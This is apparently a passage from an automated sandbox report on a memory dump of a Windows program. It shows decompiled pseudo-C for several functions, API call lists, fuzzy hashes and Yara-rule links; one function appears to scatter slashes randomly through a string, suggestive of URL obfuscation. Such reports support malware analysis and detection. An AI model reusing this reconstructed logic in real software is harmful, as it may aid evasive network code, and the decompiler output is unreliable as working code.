					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E005E5745(_t101,  &_v236, _a8, _t96 - _t81);
					E005E5745(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E005E50FF(_t101, 0x5ed1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E005E50FF(_a16, _a4);
						E005E5088(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L005EAF2E();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L005EAF28();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E005E5F21(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E005E90C2(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E005E6044(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x5ed1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                          0x005e53c9
                                                          0x005e53d5
                                                          0x005e53db
                                                          0x005e53e0
                                                          0x005e53e4
                                                          0x005e5541
                                                          0x005e5545
                                                          0x005e5545
                                                          0x005e53ea
                                                          0x005e53ee
                                                          0x005e53f2
                                                          0x005e53f5
                                                          0x005e5400
                                                          0x005e5406
                                                          0x005e540b
                                                          0x005e540e
                                                          0x005e5428
                                                          0x005e5434
                                                          0x005e543d
                                                          0x005e5447
                                                          0x005e544c
                                                          0x005e544e
                                                          0x005e5451
                                                          0x005e54ff
                                                          0x005e5505
                                                          0x005e5516
                                                          0x005e5529
                                                          0x005e5539
                                                          0x00000000
                                                          0x005e553e
                                                          0x005e545a
                                                          0x005e5461
                                                          0x005e5465
                                                          0x005e546b
                                                          0x005e546d
                                                          0x005e546f
                                                          0x005e5471
                                                          0x005e5473
                                                          0x005e547d
                                                          0x005e5482
                                                          0x005e5484
                                                          0x005e5486
                                                          0x005e5487
                                                          0x005e5488
                                                          0x005e5489
                                                          0x005e5490
                                                          0x005e5497
                                                          0x005e549a
                                                          0x005e549a
                                                          0x005e5467
                                                          0x005e5467
                                                          0x005e5467
                                                          0x005e54a2
                                                          0x005e54aa
                                                          0x005e54b3
                                                          0x005e54b8
                                                          0x005e54b8
                                                          0x005e54bd
                                                          0x00000000
                                                          0x00000000
                                                          0x005e54bf
                                                          0x005e54c2
                                                          0x005e54cc
                                                          0x00000000
                                                          0x00000000
                                                          0x005e54ce
                                                          0x005e54ce
                                                          0x005e54d8
                                                          0x005e54b8
                                                          0x005e54bd
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e54bd
                                                          0x005e54e2
                                                          0x005e54e5
                                                          0x005e54e8
                                                          0x005e54ef
                                                          0x005e54ef
                                                          0x005e54fc
                                                          0x00000000
                                                          0x005e54fc
                                                          0x005e53f7
                                                          0x005e53fb
                                                          0x005e53fc
                                                          0x005e53fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e53fe
                                                          0x00000000

                                                          APIs
                                                          • _allmul.NTDLL(?,00000000,00000000,00000001), ref: 005E5473
                                                          • _aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 005E5489
                                                          • memset.NTDLL ref: 005E5529
                                                          • memset.NTDLL ref: 005E5539
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: memset$_allmul_aulldiv
                                                          • String ID:
                                                          • API String ID: 3041852380-0
                                                          • Opcode ID: 30af34fc71cbfd30283563a111d6cc3ab09ab09b0abbfd463eca8772250551b2
                                                          • Instruction ID: 82c3dbdc485aa1f5562d16585f107270f317d88769e5846527bf185b4e39d8f0
                                                          • Opcode Fuzzy Hash: 30af34fc71cbfd30283563a111d6cc3ab09ab09b0abbfd463eca8772250551b2
                                                          • Instruction Fuzzy Hash: CC41067160069AABDF18DFAACC45BDE7B75FF84314F008529F946A7180EB709E45CB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EA81C, Relevance: 6.1, APIs: 4, Instructions: 126stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlen.KERNEL32(?,00000008,74B04D40), ref: 005EA82E
                                                            • Part of subcall function 005EA71F: RtlAllocateHeap.NTDLL(00000000,00000000,005E5595), ref: 005EA72B
                                                          • ResetEvent.KERNEL32(?), ref: 005EA8A2
                                                          • GetLastError.KERNEL32 ref: 005EA8C5
                                                          • GetLastError.KERNEL32 ref: 005EA970
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
                                                          • String ID:
                                                          • API String ID: 943265810-0
                                                          • Opcode ID: edd6cfe248ec973b70da3165914ada2207acfe4e4d5aa1c29024e71bec038545
                                                          • Instruction ID: 61f33df61bc9ee812c610cb9b0175f71c92203d2c1f42148cf6db7850f8d2e35
                                                          • Opcode Fuzzy Hash: edd6cfe248ec973b70da3165914ada2207acfe4e4d5aa1c29024e71bec038545
                                                          • Instruction Fuzzy Hash: A1417F72500284BFD7399FB2CC88E6B7FBDFB95700B114929F582D50A1D731A949DA31
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E15FF, Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 42%
                                                          			E005E15FF(void* __eax, void* __ecx) {
				char _v8;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				void* __esi;
				void* _t30;
				intOrPtr _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				void* _t54;
				long _t64;
				void* _t67;
				void* _t69;

				_t58 = __ecx;
				_t67 = __eax;
				if( *((intOrPtr*)(__eax + 0xc)) != 0) {
					L2:
					_t30 = _t67;
					_pop(_t68);
					_t69 = _t30;
					_t64 = 0;
					ResetEvent( *(_t69 + 0x1c));
					_push( &_v8);
					_push(4);
					_push( &_v20);
					_push( *((intOrPtr*)(_t69 + 0x18)));
					if( *0x5ed134() != 0) {
						L9:
						if(_v8 == 0) {
							 *((intOrPtr*)(_t69 + 0x30)) = 0;
						} else {
							 *0x5ed164(0, 1,  &_v12);
							if(0 != 0) {
								_t64 = 8;
							} else {
								_t38 = E005EA71F(0x1000);
								_v16 = _t38;
								if(_t38 == 0) {
									_t64 = 8;
								} else {
									_push(0);
									_push(_v8);
									_push( &_v20);
									while(1) {
										_t41 = _v12;
										_t61 =  *_t41;
										 *((intOrPtr*)( *_t41 + 0x10))(_t41);
										ResetEvent( *(_t69 + 0x1c));
										_push( &_v8);
										_push(0x1000);
										_push(_v16);
										_push( *((intOrPtr*)(_t69 + 0x18)));
										if( *0x5ed134() != 0) {
											goto L17;
										}
										_t64 = GetLastError();
										if(_t64 == 0x3e5) {
											_t64 = E005E5646( *(_t69 + 0x1c), _t61, 0xffffffff);
											if(_t64 == 0) {
												_t64 =  *((intOrPtr*)(_t69 + 0x28));
												if(_t64 == 0) {
													goto L17;
												}
											}
										}
										L19:
										E005EA734(_v16);
										if(_t64 == 0) {
											_t64 = E005E70CC(_v12, _t69);
										}
										goto L22;
										L17:
										_t64 = 0;
										if(_v8 != 0) {
											_push(0);
											_push(_v8);
											_push(_v16);
											continue;
										}
										goto L19;
									}
								}
								L22:
								_t39 = _v12;
								 *((intOrPtr*)( *_t39 + 8))(_t39);
							}
						}
					} else {
						_t64 = GetLastError();
						if(_t64 != 0x3e5) {
							L8:
							if(_t64 == 0) {
								goto L9;
							}
						} else {
							_t64 = E005E5646( *(_t69 + 0x1c), _t58, 0xffffffff);
							if(_t64 == 0) {
								_t64 =  *((intOrPtr*)(_t69 + 0x28));
								goto L8;
							}
						}
					}
					return _t64;
				} else {
					_t54 = E005E9242(__ecx, __eax);
					if(_t54 != 0) {
						return _t54;
					} else {
						goto L2;
					}
				}
			}
















                                                          0x005e15ff
                                                          0x005e1600
                                                          0x005e1606
                                                          0x005e1611
                                                          0x005e1611
                                                          0x005e1613
                                                          0x005e18e7
                                                          0x005e18ec
                                                          0x005e18ee
                                                          0x005e18f3
                                                          0x005e18f4
                                                          0x005e18f9
                                                          0x005e18fa
                                                          0x005e1905
                                                          0x005e1936
                                                          0x005e193b
                                                          0x005e19fe
                                                          0x005e1941
                                                          0x005e1948
                                                          0x005e1950
                                                          0x005e19fb
                                                          0x005e1956
                                                          0x005e195b
                                                          0x005e1960
                                                          0x005e1965
                                                          0x005e19ed
                                                          0x005e196b
                                                          0x005e196b
                                                          0x005e196d
                                                          0x005e1973
                                                          0x005e1974
                                                          0x005e1974
                                                          0x005e1977
                                                          0x005e197a
                                                          0x005e1980
                                                          0x005e1985
                                                          0x005e1986
                                                          0x005e198b
                                                          0x005e198e
                                                          0x005e1999
                                                          0x00000000
                                                          0x00000000
                                                          0x005e19a1
                                                          0x005e19a9
                                                          0x005e19b5
                                                          0x005e19b9
                                                          0x005e19bb
                                                          0x005e19c0
                                                          0x00000000
                                                          0x00000000
                                                          0x005e19c0
                                                          0x005e19b9
                                                          0x005e19d2
                                                          0x005e19d5
                                                          0x005e19dc
                                                          0x005e19e7
                                                          0x005e19e7
                                                          0x00000000
                                                          0x005e19c2
                                                          0x005e19c2
                                                          0x005e19c7
                                                          0x005e19c9
                                                          0x005e19ca
                                                          0x005e19cd
                                                          0x00000000
                                                          0x005e19cd
                                                          0x00000000
                                                          0x005e19c7
                                                          0x005e1974
                                                          0x005e19ee
                                                          0x005e19ee
                                                          0x005e19f4
                                                          0x005e19f4
                                                          0x005e1950
                                                          0x005e1907
                                                          0x005e190d
                                                          0x005e1915
                                                          0x005e192e
                                                          0x005e1930
                                                          0x00000000
                                                          0x00000000
                                                          0x005e1917
                                                          0x005e1921
                                                          0x005e1925
                                                          0x005e192b
                                                          0x00000000
                                                          0x005e192b
                                                          0x005e1925
                                                          0x005e1915
                                                          0x005e1a07
                                                          0x005e1608
                                                          0x005e1608
                                                          0x005e160f
                                                          0x005e161a
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e160f

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000000,?,00000102,?,?,00000000,00000000,74B481D0), ref: 005E18EE
                                                          • GetLastError.KERNEL32(?,?,?,00000000,74B481D0), ref: 005E1907
                                                          • ResetEvent.KERNEL32(?), ref: 005E1980
                                                          • GetLastError.KERNEL32 ref: 005E199B
                                                            • Part of subcall function 005E9242: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 005E9259
                                                            • Part of subcall function 005E9242: SetEvent.KERNEL32(?), ref: 005E9269
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$ObjectSingleWait
                                                          • String ID:
                                                          • API String ID: 1123145548-0
                                                          • Opcode ID: ca20e6e9e2869d8bc7b8b8763ec3b30f2bdf2cdd83cf32000103aa7e0cff363b
                                                          • Instruction ID: 3c21c63b02a39ed966ce6eac9c3feee396cb271768fdfae5734e33e116357b2d
                                                          • Opcode Fuzzy Hash: ca20e6e9e2869d8bc7b8b8763ec3b30f2bdf2cdd83cf32000103aa7e0cff363b
                                                          • Instruction Fuzzy Hash: 9F41E532600A84EFCB299BB6CC48AAE7BB9BF84360F110529E5D2D7151EB30ED459B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E3AB0, Relevance: 6.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocString.OLEAUT32(80000002), ref: 005E3B0D
                                                          • SysAllocString.OLEAUT32(005E85ED), ref: 005E3B51
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3B65
                                                          • SysFreeString.OLEAUT32(00000000), ref: 005E3B73
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: 44c35ed7e8f4618dd9c374437a249dd8cdc5defd39928b4f610accf8a23bcd67
                                                          • Instruction ID: 75ce1ac4f6e846699d49872d9d003d8800b773f8de106c373dd318237d5ce01c
                                                          • Opcode Fuzzy Hash: 44c35ed7e8f4618dd9c374437a249dd8cdc5defd39928b4f610accf8a23bcd67
                                                          • Instruction Fuzzy Hash: 64311076900289EFCB08DF99D8C88AE7FB9FF58300B10442EF5869B250D7349A45CF65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E5DF3, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 98stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrcmp.KERNEL32(00000001,00000001), ref: 005E5EA7
                                                          • lstrlen.KERNEL32(00000001,005EC298,00000028,005E6E63,00000000), ref: 005E5EB2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: lstrcmplstrlen
                                                          • String ID: (cn^$cn^
                                                          • API String ID: 898299967-1381931192
                                                          • Opcode ID: 4d9618b39a82da0521ffa697f7d021089f4abc25df3cad8479c05d6a64cd0b10
                                                          • Instruction ID: 1e69f3ca4b33e1062c11f279f8079d7162ec5cfd76c0d32cdb9738ac0d1b3855
                                                          • Opcode Fuzzy Hash: 4d9618b39a82da0521ffa697f7d021089f4abc25df3cad8479c05d6a64cd0b10
                                                          • Instruction Fuzzy Hash: 81414CB1910685CFCF1CCFAAC9846ADBBF5BF58309B248969E096AB251E7309941DF10
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E9242, Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 38%
                                                          			E005E9242(void* __ecx, void* __esi) {
				char _v8;
				long _v12;
				char _v16;
				long _v20;
				long _t34;
				long _t39;
				long _t42;
				long _t56;
				intOrPtr _t58;
				void* _t59;
				intOrPtr* _t60;
				void* _t61;

				_t61 = __esi;
				_t59 = __ecx;
				_t60 =  *0x5ed13c; // 0x5eabf1
				 *((intOrPtr*)(__esi + 0x2c)) = 0;
				do {
					_t34 = WaitForSingleObject( *(_t61 + 0x1c), 0);
					_v20 = _t34;
					if(_t34 != 0) {
						L3:
						_push( &_v16);
						_push( &_v8);
						_push(_t61 + 0x2c);
						_push(0x20000013);
						_push( *((intOrPtr*)(_t61 + 0x18)));
						_v8 = 4;
						_v16 = 0;
						if( *_t60() == 0) {
							_t39 = GetLastError();
							_v12 = _t39;
							if(_v20 == 0 || _t39 != 0x2ef3) {
								L15:
								return _v12;
							} else {
								goto L11;
							}
						}
						if(_v8 != 4 ||  *((intOrPtr*)(_t61 + 0x2c)) == 0) {
							goto L11;
						} else {
							_v16 = 0;
							_v8 = 0;
							 *_t60( *((intOrPtr*)(_t61 + 0x18)), 0x16, 0,  &_v8,  &_v16);
							_t58 = E005EA71F(_v8 + 1);
							if(_t58 == 0) {
								_v12 = 8;
							} else {
								_push( &_v16);
								_push( &_v8);
								_push(_t58);
								_push(0x16);
								_push( *((intOrPtr*)(_t61 + 0x18)));
								if( *_t60() == 0) {
									E005EA734(_t58);
									_v12 = GetLastError();
								} else {
									 *((char*)(_t58 + _v8)) = 0;
									 *((intOrPtr*)(_t61 + 0xc)) = _t58;
								}
							}
							goto L15;
						}
					}
					SetEvent( *(_t61 + 0x1c));
					_t56 =  *((intOrPtr*)(_t61 + 0x28));
					_v12 = _t56;
					if(_t56 != 0) {
						goto L15;
					}
					goto L3;
					L11:
					_t42 = E005E5646( *(_t61 + 0x1c), _t59, 0xea60);
					_v12 = _t42;
				} while (_t42 == 0);
				goto L15;
			}















                                                          0x005e9242
                                                          0x005e9242
                                                          0x005e924c
                                                          0x005e9252
                                                          0x005e9255
                                                          0x005e9259
                                                          0x005e925f
                                                          0x005e9264
                                                          0x005e927d
                                                          0x005e9280
                                                          0x005e9284
                                                          0x005e9288
                                                          0x005e9289
                                                          0x005e928e
                                                          0x005e9291
                                                          0x005e9298
                                                          0x005e929f
                                                          0x005e92f2
                                                          0x005e92f8
                                                          0x005e92fe
                                                          0x005e9339
                                                          0x005e933f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e92fe
                                                          0x005e92a5
                                                          0x00000000
                                                          0x005e92ac
                                                          0x005e92ba
                                                          0x005e92bd
                                                          0x005e92c0
                                                          0x005e92cc
                                                          0x005e92d0
                                                          0x005e9332
                                                          0x005e92d2
                                                          0x005e92d5
                                                          0x005e92d9
                                                          0x005e92da
                                                          0x005e92db
                                                          0x005e92dd
                                                          0x005e92e4
                                                          0x005e9322
                                                          0x005e932d
                                                          0x005e92e6
                                                          0x005e92e9
                                                          0x005e92ed
                                                          0x005e92ed
                                                          0x005e92e4
                                                          0x00000000
                                                          0x005e92d0
                                                          0x005e92a5
                                                          0x005e9269
                                                          0x005e926f
                                                          0x005e9272
                                                          0x005e9277
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005e9307
                                                          0x005e930f
                                                          0x005e9314
                                                          0x005e9317
                                                          0x00000000

                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,00000000,00000000,00000102,?,00000000,00000000,74B481D0), ref: 005E9259
                                                          • SetEvent.KERNEL32(?), ref: 005E9269
                                                          • GetLastError.KERNEL32 ref: 005E92F2
                                                            • Part of subcall function 005E5646: WaitForMultipleObjects.KERNEL32(00000002,005EA8E3,00000000,005EA8E3,?,?,?,005EA8E3,0000EA60), ref: 005E5661
                                                            • Part of subcall function 005EA734: HeapFree.KERNEL32(00000000,00000000,005E5637,00000000,?,?,00000000), ref: 005EA740
                                                          • GetLastError.KERNEL32(00000000), ref: 005E9327
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
                                                          • String ID:
                                                          • API String ID: 602384898-0
                                                          • Opcode ID: 556e3f01598b9aceb0856358aef6326a6674404a7ec3f5c80dbd1d10691571e8
                                                          • Instruction ID: 0b61764bb7340056a26f0d33ca2624706fb0f03821d8483e72ac3479787e6dbd
                                                          • Opcode Fuzzy Hash: 556e3f01598b9aceb0856358aef6326a6674404a7ec3f5c80dbd1d10691571e8
                                                          • Instruction Fuzzy Hash: 37312FB5900389EFDB24DFA6CCC499EBFB8FB18304F10496AE592E6151D730EA499F50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E36B1, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 40%
                                                          			E005E36B1(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t38 = E005E3BB9(__ecx,  &_v32);
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t16 =  &(_t39[1]); // 0x5
						_t23 = _t16;
						if( *_t16 != 0) {
							E005E4F79(_t23);
						}
					}
					return _t38;
				}
				if(E005EA2F9(0x40,  &_v16) != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0x5ed2ac, 1, 0,  *0x5ed344);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8);
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E005EA446(_t36);
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E005E853F(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E005E4F14(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E005E11EE( &_v32, _t39);
					goto L13;
				}
			}












                                                          0x005e36b1
                                                          0x005e36be
                                                          0x005e36c4
                                                          0x005e36c5
                                                          0x005e36c6
                                                          0x005e36c7
                                                          0x005e36c8
                                                          0x005e36cc
                                                          0x005e36d8
                                                          0x005e36dc
                                                          0x005e3764
                                                          0x005e3764
                                                          0x005e3767
                                                          0x005e3769
                                                          0x005e3771
                                                          0x005e3771
                                                          0x005e3777
                                                          0x005e377a
                                                          0x005e377a
                                                          0x005e3777
                                                          0x005e3785
                                                          0x005e3785
                                                          0x005e36ef
                                                          0x005e36f1
                                                          0x005e36f1
                                                          0x005e3708
                                                          0x005e370c
                                                          0x005e370f
                                                          0x005e371a
                                                          0x005e3721
                                                          0x005e3721
                                                          0x005e372a
                                                          0x005e372e
                                                          0x005e373c
                                                          0x005e3730
                                                          0x005e3730
                                                          0x005e3731
                                                          0x005e3732
                                                          0x005e3733
                                                          0x005e3734
                                                          0x005e3735
                                                          0x005e3735
                                                          0x005e3741
                                                          0x005e3744
                                                          0x005e3748
                                                          0x005e374a
                                                          0x005e374a
                                                          0x005e3751
                                                          0x00000000
                                                          0x005e3753
                                                          0x005e3753
                                                          0x005e3760
                                                          0x00000000
                                                          0x005e3760

                                                          APIs
                                                          • CreateEventA.KERNEL32(005ED2AC,00000001,00000000,00000040,00000001,?,74B5F710,00000000,74B5F730,?,?,?,005E52AA,?,00000001,?), ref: 005E3702
                                                          • SetEvent.KERNEL32(00000000,?,?,?,005E52AA,?,00000001,?,00000002,?,?,^]^,?), ref: 005E370F
                                                          • Sleep.KERNEL32(00000BB8,?,?,?,005E52AA,?,00000001,?,00000002,?,?,^]^,?), ref: 005E371A
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,005E52AA,?,00000001,?,00000002,?,?,^]^,?), ref: 005E3721
                                                            • Part of subcall function 005EA446: WaitForSingleObject.KERNEL32(00000000,00000001,?,?,?,00000000,A7^,?,?,?,?,?,005E3741,?), ref: 005EA520
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleObjectSingleSleepWait
                                                          • String ID:
                                                          • API String ID: 2559942907-0
                                                          • Opcode ID: 2717ed263233bdd841c0c8d0698886ee4236ea977133120e5012bcc02452e117
                                                          • Instruction ID: addab0db08e5705a268fc5d99a104aa7964a385a025ffcfcac4af7dbb60ff735
                                                          • Opcode Fuzzy Hash: 2717ed263233bdd841c0c8d0698886ee4236ea977133120e5012bcc02452e117
                                                          • Instruction Fuzzy Hash: 9F21A4F3900296ABCF18AFE6888D8AEBF69FF44350B004425FA91A7100D6349B45CB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005E17E5, Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 68%
                                                          			E005E17E5(unsigned int __eax, void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _t21;
				signed short _t23;
				char* _t27;
				void* _t29;
				void* _t30;
				unsigned int _t33;
				void* _t37;
				unsigned int _t38;
				void* _t41;
				void* _t42;
				int _t45;
				void* _t46;

				_t42 = __eax;
				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);
				_t38 = __eax;
				_t30 = RtlAllocateHeap( *0x5ed238, 0, (__eax >> 3) + __eax + 1);
				_v12 = _t30;
				if(_t30 != 0) {
					_v8 = _t42;
					do {
						_t33 = 0x18;
						if(_t38 <= _t33) {
							_t33 = _t38;
						}
						_t21 =  *0x5ed250; // 0x27747965
						_t23 = 0x3c6ef35f + _t21 * 0x19660d;
						 *0x5ed250 = _t23;
						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
						memcpy(_t30, _v8, _t45);
						_v8 = _v8 + _t45;
						_t27 = _t30 + _t45;
						_t38 = _t38 - _t45;
						_t46 = _t46 + 0xc;
						 *_t27 = 0x2f;
						_t13 = _t27 + 1; // 0x1
						_t30 = _t13;
					} while (_t38 > 8);
					memcpy(_t30, _v8, _t38 + 1);
				}
				return _v12;
			}

















                                                          0x005e17ed
                                                          0x005e17f0
                                                          0x005e17f6
                                                          0x005e180e
                                                          0x005e1810
                                                          0x005e1815
                                                          0x005e1817
                                                          0x005e181a
                                                          0x005e181c
                                                          0x005e181f
                                                          0x005e1821
                                                          0x005e1821
                                                          0x005e1823
                                                          0x005e182e
                                                          0x005e1833
                                                          0x005e1844
                                                          0x005e184c
                                                          0x005e1851
                                                          0x005e1854
                                                          0x005e1857
                                                          0x005e1859
                                                          0x005e185c
                                                          0x005e185f
                                                          0x005e185f
                                                          0x005e1862
                                                          0x005e186d
                                                          0x005e1872
                                                          0x005e187c

                                                          APIs
                                                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,005E1C49,00000000,?,?,005E20C2,?,016695B0), ref: 005E17F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 005E1808
                                                          • memcpy.NTDLL(00000000,?,-00000008,?,?,?,005E1C49,00000000,?,?,005E20C2,?,016695B0), ref: 005E184C
                                                          • memcpy.NTDLL(00000001,?,00000001), ref: 005E186D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
